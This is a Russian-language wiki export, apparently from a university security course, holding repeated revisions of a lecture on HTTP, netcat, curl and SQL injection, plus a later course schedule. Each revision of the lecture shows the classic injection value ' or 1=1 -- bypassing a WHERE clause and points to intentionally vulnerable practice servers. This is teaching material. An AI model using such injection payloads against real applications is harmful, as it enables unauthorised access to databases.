Клиенты (например, веб-браузеры) взаимодействуют с веб-приложениями по протоколу '''HTTP''' ([https://ru.wikipedia.org/wiki/HTTP википедия], стандарт HTTP 1.1: [https://tools.ietf.org/html/rfc2616 RFC 2616], [https://tools.ietf.org/html/rfc7230 RFC 7230], [https://tools.ietf.org/html/rfc7231 RFC 7231]). Он работает поверх [https://ru.wikipedia.org/wiki/Transmission_Control_Protocol TCP], стандартный TCP-порт для HTTP это порт '''80''', а для HTTPS (HTTP поверх SSL, т. е. с шифрованием) это порт '''443'''. Протокол состоит из запросов (которые клиент отправляет серверу) и ответов (которые сервер присылает в ответ). Протокол HTTP версии 1.1 (наиболее используемой в данный момент) и более ранних - текстовый, то есть сообщения этого протокола человекочитаемые. К примеру, вот запрос, который сделает браузер при переходе по URL http://sql1.stands.course.secsem.ru/users:<br>[[Файл:Http-req-annot.png]] <br>Ответ сервера на него:<br>[[Файл:Http-res-annot.png]]<br>Ещё пример, запрос, который сделает браузер при попытке (неудачной) залогиниться на сайте vk.com c почтой "admin@adminmail.ru" и паролем "adminpassword":<br>[[Файл:Http-req-post-annot.png]]<br>Ответ сервера на этот запрос<br>[[Файл:Http-res-post-annot.png]]

Еще информация: про основы веб-технологий <s>[http://old.secsem.ru/lections?action=AttachFile&do=get&target=infosec-network2013-4-%D0%9E%D1%81%D0%BD%D0%BE%D0%B2%D1%8B+%D0%B2%D0%B5%D0%B1-%D1%82%D0%B5%D1%85%D0%BD%D0%BE%D0%BB%D0%BE%D0%B3%D0%B8%D0%B9.pdf в слайдах нашего спецкурса 2013 года]</s> [https://www.youtube.com/watch?v=drpCqzSpvq4 в видео лекции Андрея Петухова на нашем спецкурсе 2013 года].

== Инструменты ==

=== Burp Suite ===

Для анализа HTTP-взаимодействия между клиентом и сервером, а также для вмешательства в него удобен '''Burp Suite'''. Он может работать как HTTP-proxy, то есть получать от клиента запрос и пересылать его серверу, получать ответ сервера и передавать его клиенту. При этом Burp может показывать запросы и ответы пользователю, задерживать и изменять их. Кроме этого, он может формировать и отправлять новые HTTP-запросы сам ("вручную"). [https://portswigger.net/burp/documentation/desktop/getting-started Здесь написано как его скачать и начать использовать].

=== Netcat и curl ===

Более простые инструменты, позволяющие отправлять HTTP-запросы веб-приложению и получать ответы - '''netcat''' и '''curl'''.

'''Netcat''' ([https://www.opennet.ru/man.shtml?topic=netcat man]) позволяет установить tcp-соединение, после чего отправляет на другой конец всё что подано ему на стандартный ввод и печатает на стандартный вывод всё, что получил. Он позволяет буквально "руками" набрать и отправить HTTP-запрос. Вот как можно отправить запрос, соответствующий переходу по URL http://mail.ru:
<pre>$ nc mail.ru 80
GET / HTTP/1.1
Host: mail.ru

HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Sun, 24 Feb 2019 20:08:08 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: https://mail.ru
X-XSS-Protection: 1; mode=block; report=https://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.14.1</center>
</body>
</html>
^C</pre>
То же самое, но с флагом "-v" (который говорит Netcat выдавать более подробную диагностику, в т. ч. написать об успешности установления TCP-соединения и парой дополнительных HTTP-заголовков (заголовок "Connection: close" говорит серверу что после этого запроса TCP-соединение будет закрыто, новых запросов в нём не будет):
<pre>$ nc -v mail.ru 80
Connection to mail.ru 80 port [tcp/http] succeeded!
GET / HTTP/1.1
Host: mail.ru
Accept: */*
Connection: close

HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Sun, 24 Feb 2019 20:14:37 GMT
Content-Type: text/html
Content-Length: 185
Connection: close
Location: https://mail.ru
X-XSS-Protection: 1; mode=block; report=https://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.14.1</center>
</body>
</html></pre>

'''curl''' ([https://curl.haxx.se/docs/manpage.html man]) позволяет очень просто делать HTTP-запросы из консоли.
<pre>$ curl -v http://example.org
* Rebuilt URL to: http://example.org/
* Trying 93.184.216.34...
* TCP_NODELAY set
* Connected to example.org (93.184.216.34) port 80 (#0)
> GET / HTTP/1.1
> Host: example.org
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Cache-Control: max-age=604800
< Content-Type: text/html; charset=UTF-8
< Date: Sun, 24 Feb 2019 20:33:38 GMT
< Etag: "1541025663+ident"
< Expires: Sun, 03 Mar 2019 20:33:38 GMT
< Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
< Server: ECS (phd/FD58)
< Vary: Accept-Encoding
< X-Cache: HIT
< Content-Length: 1270
<
<!doctype html>
<html>
<head>
<title>Example Domain</title>

<meta charset="utf-8" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
...</pre>

== SQL injection ==

Веб-приложения нередко используют SQL-базы данных, т. е. такие БД, взаимодействие с которыми осуществляется через запросы на языке '''SQL''' ([https://ru.wikipedia.org/wiki/SQL википедия], [http://citforum.ru/database/osbd/glava_55.shtml#_5 курс "Основы современных баз данных" С.Д. Кузнецова]). Поиграться с SQL можно просто в [http://sqlfiddle.postgrespro.ru/#!17//5814 SQL Fiddle] или с помощью [https://linux.die.net/man/1/sqlite3 sqlite3]. Пример SQL-запросов и ответов на них:<br>[[Файл:Sql1-annotated.png]]<br>[[Файл:Sql2-annotated.png]]<br>Веб-приложение формирует и отправляет базе SQL-запросы, которые могут зависеть от параметров, пришедших от клиента (взятых из HTTP-запроса). SQL-запросы текстовые и простой способ сделать запрос, зависящий от параметра - просто подставить этот параметр в текст запроса.
Пример кода (на языке [https://www.python.org/ Python]), подставляющего параметр из HTTP-запроса в SQL-запрос к базе:
[[Файл:Sqli-code.png|650px]]
Здесь "request.args.get('login')" считывает значение параметра "login" query string запроса. Вот какой вид примет запрос, если параметр login будет иметь значение "testuser".

[[Файл:Sql-req.png|520px]]

Значение "testuser" подставилось в строковый литерал в одинарных кавычках. Говорят, что значение попало в '''контекст''' строкового литерала.
После такой подстановки может оказаться, что смысл SQL-запроса изменился и данные, подставленые в запрос стали не просто значением параметра запроса (скажем, числовым или стокововым литералом), а какими-то еще конструкциями языка SQL. Вот какой запрос будет сформирован, если параметр "login" будет иметь значение <code>' or 1=1 --</code>:

[[Файл:Sqli-annot.png|540px]]

В результате выражение в <code>WHERE</code>-части приняло вид <code>login='' or 1=1</code>, оно будет истинным для любой строки таблицы, в результате чего в ответ на этот запрос будут возвращены все строки таблицы. Так же можно изменить смысл запроса и передав специфическое значение параметра id для этого кода (для этого даже не придётся добавлять в значение параметра кавычку):

[[Файл:Sql-id.png|520px]]

Возможность передать такое значение параметра HTTP-запроса, которое подставится в текст SQL-запроса и при подстановке изменит смысл этого запроса называется '''SQL injection''' ([https://www.owasp.org/index.php/SQL_Injection OWASP]). Хорошую статью про SQL injection можно [https://rdot.org/forum/showthread.php?s=f4292383c9896b773bd98d827eb9411f&t=124 найти тут] и [http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet еще тут].

Попробовать эксплуатировать SQL injection можно на этих уязвимых приложениях:
* http://sql1.stands.course.secsem.ru/ ([https://course.secsem.ru/task-src/sql1.tgz исходный код])
* http://sql2.stands.course.secsem.ru/

Фактически, SQLi это один из представителей класса уязвимостей '''injection''', которые получаются, если в какие-то управляющие команды подставляются параметры-данные от пользователя и эти данные могут выйти из контекста, куда подставляются, перестав быть просто данными, и поменять смысл команды.

Введение в практическую безопасность (2019)/HTTP, инструменты & SQL injection

2022-06-30T17:26:16Z

Asterite: /* HTTP */

__NOTOC__
== HTTP ==

Клиенты (например, веб-браузеры) взаимодействуют с веб-приложениями по протоколу '''HTTP''' ([https://ru.wikipedia.org/wiki/HTTP википедия], стандарт HTTP 1.1: [https://tools.ietf.org/html/rfc2616 RFC 2616], [https://tools.ietf.org/html/rfc7230 RFC 7230], [https://tools.ietf.org/html/rfc7231 RFC 7231]). Он работает поверх [https://ru.wikipedia.org/wiki/Transmission_Control_Protocol TCP], стандартный TCP-порт для HTTP это порт '''80''', а для HTTPS (HTTP поверх SSL, т. е. с шифрованием) это порт '''443'''. Протокол состоит из запросов (которые клиент отправляет серверу) и ответов (которые сервер присылает в ответ). Протокол HTTP версии 1.1 (наиболее используемой в данный момент) и более ранних - текстовый, то есть сообщения этого протокола человекочитаемые. К примеру, вот запрос, который сделает браузер при переходе по URL http://sql1.stands.course.secsem.ru/users:<br>[[Файл:Http-req-annot.png]] <br>Ответ сервера на него:<br>[[Файл:Http-res-annot.png]]<br>Ещё пример, запрос, который сделает браузер при попытке (неудачной) залогиниться на сайте vk.com c почтой "admin@adminmail.ru" и паролем "adminpassword":<br>[[Файл:Http-req-post-annot.png]]<br>Ответ сервера на этот запрос<br>[[Файл:Http-res-post-annot.png]]

Еще информация: про основы веб-технологий <s>[http://old.secsem.ru/lections?action=AttachFile&do=get&target=infosec-network2013-4-%D0%9E%D1%81%D0%BD%D0%BE%D0%B2%D1%8B+%D0%B2%D0%B5%D0%B1-%D1%82%D0%B5%D1%85%D0%BD%D0%BE%D0%BB%D0%BE%D0%B3%D0%B8%D0%B9.pdf в слайдах нашего спецкурса 2013 года]</s> [https://www.youtube.com/watch?v=drpCqzSpvq4 в видео лекции Андрея Петухова на нашем спецкурсе 2013 года].

== Инструменты ==

=== Burp Suite ===

Для анализа HTTP-взаимодействия между клиентом и сервером, а также для вмешательства в него удобен '''Burp Suite'''. Он может работать как HTTP-proxy, то есть получать от клиента запрос и пересылать его серверу, получать ответ сервера и передавать его клиенту. При этом Burp может показывать запросы и ответы пользователю, задерживать и изменять их. Кроме этого, он может формировать и отправлять новые HTTP-запросы сам ("вручную"). [http://demo.secsem.ru/workshop/burp Здесь написано как его скачать и начать использовать].

=== Netcat и curl ===

Более простые инструменты, позволяющие отправлять HTTP-запросы веб-приложению и получать ответы - '''netcat''' и '''curl'''.

'''Netcat''' ([https://www.opennet.ru/man.shtml?topic=netcat man]) позволяет установить tcp-соединение, после чего отправляет на другой конец всё что подано ему на стандартный ввод и печатает на стандартный вывод всё, что получил. Он позволяет буквально "руками" набрать и отправить HTTP-запрос. Вот как можно отправить запрос, соответствующий переходу по URL http://mail.ru:
<pre>$ nc mail.ru 80
GET / HTTP/1.1
Host: mail.ru

HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Sun, 24 Feb 2019 20:08:08 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: https://mail.ru
X-XSS-Protection: 1; mode=block; report=https://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.14.1</center>
</body>
</html>
^C</pre>
То же самое, но с флагом "-v" (который говорит Netcat выдавать более подробную диагностику, в т. ч. написать об успешности установления TCP-соединения и парой дополнительных HTTP-заголовков (заголовок "Connection: close" говорит серверу что после этого запроса TCP-соединение будет закрыто, новых запросов в нём не будет):
<pre>$ nc -v mail.ru 80
Connection to mail.ru 80 port [tcp/http] succeeded!
GET / HTTP/1.1
Host: mail.ru
Accept: */*
Connection: close

HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Sun, 24 Feb 2019 20:14:37 GMT
Content-Type: text/html
Content-Length: 185
Connection: close
Location: https://mail.ru
X-XSS-Protection: 1; mode=block; report=https://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.14.1</center>
</body>
</html></pre>

'''curl''' ([https://curl.haxx.se/docs/manpage.html man]) позволяет очень просто делать HTTP-запросы из консоли.
<pre>$ curl -v http://example.org
* Rebuilt URL to: http://example.org/
* Trying 93.184.216.34...
* TCP_NODELAY set
* Connected to example.org (93.184.216.34) port 80 (#0)
> GET / HTTP/1.1
> Host: example.org
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Cache-Control: max-age=604800
< Content-Type: text/html; charset=UTF-8
< Date: Sun, 24 Feb 2019 20:33:38 GMT
< Etag: "1541025663+ident"
< Expires: Sun, 03 Mar 2019 20:33:38 GMT
< Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
< Server: ECS (phd/FD58)
< Vary: Accept-Encoding
< X-Cache: HIT
< Content-Length: 1270
<
<!doctype html>
<html>
<head>
<title>Example Domain</title>

<meta charset="utf-8" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
...</pre>

== SQL injection ==

Веб-приложения нередко используют SQL-базы данных, т. е. такие БД, взаимодействие с которыми осуществляется через запросы на языке '''SQL''' ([https://ru.wikipedia.org/wiki/SQL википедия], [http://citforum.ru/database/osbd/glava_55.shtml#_5 курс "Основы современных баз данных" С.Д. Кузнецова]). Поиграться с SQL можно просто в [http://sqlfiddle.postgrespro.ru/#!17//5814 SQL Fiddle] или с помощью [https://linux.die.net/man/1/sqlite3 sqlite3]. Пример SQL-запросов и ответов на них:<br>[[Файл:Sql1-annotated.png]]<br>[[Файл:Sql2-annotated.png]]<br>Веб-приложение формирует и отправляет базе SQL-запросы, которые могут зависеть от параметров, пришедших от клиента (взятых из HTTP-запроса). SQL-запросы текстовые и простой способ сделать запрос, зависящий от параметра - просто подставить этот параметр в текст запроса.
Пример кода (на языке [https://www.python.org/ Python]), подставляющего параметр из HTTP-запроса в SQL-запрос к базе:
[[Файл:Sqli-code.png|650px]]
Здесь "request.args.get('login')" считывает значение параметра "login" query string запроса. Вот какой вид примет запрос, если параметр login будет иметь значение "testuser".

[[Файл:Sql-req.png|520px]]

Значение "testuser" подставилось в строковый литерал в одинарных кавычках. Говорят, что значение попало в '''контекст''' строкового литерала.
После такой подстановки может оказаться, что смысл SQL-запроса изменился и данные, подставленые в запрос стали не просто значением параметра запроса (скажем, числовым или стокововым литералом), а какими-то еще конструкциями языка SQL. Вот какой запрос будет сформирован, если параметр "login" будет иметь значение <code>' or 1=1 --</code>:

[[Файл:Sqli-annot.png|540px]]

В результате выражение в <code>WHERE</code>-части приняло вид <code>login='' or 1=1</code>, оно будет истинным для любой строки таблицы, в результате чего в ответ на этот запрос будут возвращены все строки таблицы. Так же можно изменить смысл запроса и передав специфическое значение параметра id для этого кода (для этого даже не придётся добавлять в значение параметра кавычку):

[[Файл:Sql-id.png|520px]]

Возможность передать такое значение параметра HTTP-запроса, которое подставится в текст SQL-запроса и при подстановке изменит смысл этого запроса называется '''SQL injection''' ([https://www.owasp.org/index.php/SQL_Injection OWASP]). Хорошую статью про SQL injection можно [https://rdot.org/forum/showthread.php?s=f4292383c9896b773bd98d827eb9411f&t=124 найти тут] и [http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet еще тут].

Попробовать эксплуатировать SQL injection можно на этих уязвимых приложениях:
* http://sql1.stands.course.secsem.ru/ ([https://course.secsem.ru/task-src/sql1.tgz исходный код])
* http://sql2.stands.course.secsem.ru/

Фактически, SQLi это один из представителей класса уязвимостей '''injection''', которые получаются, если в какие-то управляющие команды подставляются параметры-данные от пользователя и эти данные могут выйти из контекста, куда подставляются, перестав быть просто данными, и поменять смысл команды.

Введение в практическую безопасность (2019)/HTTP, инструменты & SQL injection

2022-06-30T17:25:54Z

Asterite: /* HTTP */

__NOTOC__
== HTTP ==

Клиенты (например, веб-браузеры) взаимодействуют с веб-приложениями по протоколу '''HTTP''' ([https://ru.wikipedia.org/wiki/HTTP википедия], стандарт HTTP 1.1: [https://tools.ietf.org/html/rfc2616 RFC 2616], [https://tools.ietf.org/html/rfc7230 RFC 7230], [https://tools.ietf.org/html/rfc7231 RFC 7231]). Он работает поверх [https://ru.wikipedia.org/wiki/Transmission_Control_Protocol TCP], стандартный TCP-порт для HTTP это порт '''80''', а для HTTPS (HTTP поверх SSL, т. е. с шифрованием) это порт '''443'''. Протокол состоит из запросов (которые клиент отправляет серверу) и ответов (которые сервер присылает в ответ). Протокол HTTP версии 1.1 (наиболее используемой в данный момент) и более ранних - текстовый, то есть сообщения этого протокола человекочитаемые. К примеру, вот запрос, который сделает браузер при переходе по URL http://sql1.stands.course.secsem.ru/users:<br>[[Файл:Http-req-annot.png]] <br>Ответ сервера на него:<br>[[Файл:Http-res-annot.png]]<br>Ещё пример, запрос, который сделает браузер при попытке (неудачной) залогиниться на сайте vk.com c почтой "admin@adminmail.ru" и паролем "adminpassword":<br>[[Файл:Http-req-post-annot.png]]<br>Ответ сервера на этот запрос<br>[[Файл:Http-res-post-annot.png]]

Еще информация: про основы веб-технологий <s>[http://old.secsem.ru/lections?action=AttachFile&do=get&target=infosec-network2013-4-%D0%9E%D1%81%D0%BD%D0%BE%D0%B2%D1%8B+%D0%B2%D0%B5%D0%B1-%D1%82%D0%B5%D1%85%D0%BD%D0%BE%D0%BB%D0%BE%D0%B3%D0%B8%D0%B9.pdf в слайдах нашего спецкурса 2013 года].</s> [https://www.youtube.com/watch?v=drpCqzSpvq4 в видео лекции Андрея Петухова на нашем спецкурсе 2013 года]

== Инструменты ==

=== Burp Suite ===

Для анализа HTTP-взаимодействия между клиентом и сервером, а также для вмешательства в него удобен '''Burp Suite'''. Он может работать как HTTP-proxy, то есть получать от клиента запрос и пересылать его серверу, получать ответ сервера и передавать его клиенту. При этом Burp может показывать запросы и ответы пользователю, задерживать и изменять их. Кроме этого, он может формировать и отправлять новые HTTP-запросы сам ("вручную"). [http://demo.secsem.ru/workshop/burp Здесь написано как его скачать и начать использовать].

=== Netcat и curl ===

Более простые инструменты, позволяющие отправлять HTTP-запросы веб-приложению и получать ответы - '''netcat''' и '''curl'''.

'''Netcat''' ([https://www.opennet.ru/man.shtml?topic=netcat man]) позволяет установить tcp-соединение, после чего отправляет на другой конец всё что подано ему на стандартный ввод и печатает на стандартный вывод всё, что получил. Он позволяет буквально "руками" набрать и отправить HTTP-запрос. Вот как можно отправить запрос, соответствующий переходу по URL http://mail.ru:
<pre>$ nc mail.ru 80
GET / HTTP/1.1
Host: mail.ru

HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Sun, 24 Feb 2019 20:08:08 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: https://mail.ru
X-XSS-Protection: 1; mode=block; report=https://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.14.1</center>
</body>
</html>
^C</pre>
То же самое, но с флагом "-v" (который говорит Netcat выдавать более подробную диагностику, в т. ч. написать об успешности установления TCP-соединения и парой дополнительных HTTP-заголовков (заголовок "Connection: close" говорит серверу что после этого запроса TCP-соединение будет закрыто, новых запросов в нём не будет):
<pre>$ nc -v mail.ru 80
Connection to mail.ru 80 port [tcp/http] succeeded!
GET / HTTP/1.1
Host: mail.ru
Accept: */*
Connection: close

HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Sun, 24 Feb 2019 20:14:37 GMT
Content-Type: text/html
Content-Length: 185
Connection: close
Location: https://mail.ru
X-XSS-Protection: 1; mode=block; report=https://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.14.1</center>
</body>
</html></pre>

'''curl''' ([https://curl.haxx.se/docs/manpage.html man]) позволяет очень просто делать HTTP-запросы из консоли.
<pre>$ curl -v http://example.org
* Rebuilt URL to: http://example.org/
* Trying 93.184.216.34...
* TCP_NODELAY set
* Connected to example.org (93.184.216.34) port 80 (#0)
> GET / HTTP/1.1
> Host: example.org
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Cache-Control: max-age=604800
< Content-Type: text/html; charset=UTF-8
< Date: Sun, 24 Feb 2019 20:33:38 GMT
< Etag: "1541025663+ident"
< Expires: Sun, 03 Mar 2019 20:33:38 GMT
< Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
< Server: ECS (phd/FD58)
< Vary: Accept-Encoding
< X-Cache: HIT
< Content-Length: 1270
<
<!doctype html>
<html>
<head>
<title>Example Domain</title>

<meta charset="utf-8" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
...</pre>

== SQL injection ==

Веб-приложения нередко используют SQL-базы данных, т. е. такие БД, взаимодействие с которыми осуществляется через запросы на языке '''SQL''' ([https://ru.wikipedia.org/wiki/SQL википедия], [http://citforum.ru/database/osbd/glava_55.shtml#_5 курс "Основы современных баз данных" С.Д. Кузнецова]). Поиграться с SQL можно просто в [http://sqlfiddle.postgrespro.ru/#!17//5814 SQL Fiddle] или с помощью [https://linux.die.net/man/1/sqlite3 sqlite3]. Пример SQL-запросов и ответов на них:<br>[[Файл:Sql1-annotated.png]]<br>[[Файл:Sql2-annotated.png]]<br>Веб-приложение формирует и отправляет базе SQL-запросы, которые могут зависеть от параметров, пришедших от клиента (взятых из HTTP-запроса). SQL-запросы текстовые и простой способ сделать запрос, зависящий от параметра - просто подставить этот параметр в текст запроса.
Пример кода (на языке [https://www.python.org/ Python]), подставляющего параметр из HTTP-запроса в SQL-запрос к базе:
[[Файл:Sqli-code.png|650px]]
Здесь "request.args.get('login')" считывает значение параметра "login" query string запроса. Вот какой вид примет запрос, если параметр login будет иметь значение "testuser".

[[Файл:Sql-req.png|520px]]

Значение "testuser" подставилось в строковый литерал в одинарных кавычках. Говорят, что значение попало в '''контекст''' строкового литерала.
После такой подстановки может оказаться, что смысл SQL-запроса изменился и данные, подставленые в запрос стали не просто значением параметра запроса (скажем, числовым или стокововым литералом), а какими-то еще конструкциями языка SQL. Вот какой запрос будет сформирован, если параметр "login" будет иметь значение <code>' or 1=1 --</code>:

[[Файл:Sqli-annot.png|540px]]

В результате выражение в <code>WHERE</code>-части приняло вид <code>login='' or 1=1</code>, оно будет истинным для любой строки таблицы, в результате чего в ответ на этот запрос будут возвращены все строки таблицы. Так же можно изменить смысл запроса и передав специфическое значение параметра id для этого кода (для этого даже не придётся добавлять в значение параметра кавычку):

[[Файл:Sql-id.png|520px]]

Возможность передать такое значение параметра HTTP-запроса, которое подставится в текст SQL-запроса и при подстановке изменит смысл этого запроса называется '''SQL injection''' ([https://www.owasp.org/index.php/SQL_Injection OWASP]). Хорошую статью про SQL injection можно [https://rdot.org/forum/showthread.php?s=f4292383c9896b773bd98d827eb9411f&t=124 найти тут] и [http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet еще тут].

Попробовать эксплуатировать SQL injection можно на этих уязвимых приложениях:
* http://sql1.stands.course.secsem.ru/ ([https://course.secsem.ru/task-src/sql1.tgz исходный код])
* http://sql2.stands.course.secsem.ru/

Фактически, SQLi это один из представителей класса уязвимостей '''injection''', которые получаются, если в какие-то управляющие команды подставляются параметры-данные от пользователя и эти данные могут выйти из контекста, куда подставляются, перестав быть просто данными, и поменять смысл команды.

Дополнительные главы практической безопасности (2021)

2021-06-02T16:42:52Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]], [https://youtu.be/Dz7r4pEoprs видео])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([https://www.youtube.com/watch?v=FxVil6DUD4o видео - часть 1], [https://www.youtube.com/watch?v=MrH9tN7tvOw видео - часть 2], [//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды] [https://www.youtube.com/watch?v=9nFQAL06mTE видео])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды] [https://www.youtube.com/watch?v=oKvppCZkSng видео])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды], [https://youtu.be/p195JmRCvNs видео - часть 1], [https://youtu.be/eGTzK9w1egk видео - часть 2])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды], [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка], [https://www.youtube.com/watch?v=yPmCs39Aodc видео])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни ([https://www.youtube.com/watch?v=dtoUPpVwGIo видео])
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды], [https://www.youtube.com/watch?v=KK2z-jCxBwk видео])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T12:48:45Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]], [https://www.youtube.com/watch?v=movbw--okVQ видео])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([https://www.youtube.com/watch?v=FxVil6DUD4o видео - часть 1], [https://www.youtube.com/watch?v=MrH9tN7tvOw видео - часть 2], [//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды] [https://www.youtube.com/watch?v=9nFQAL06mTE видео])
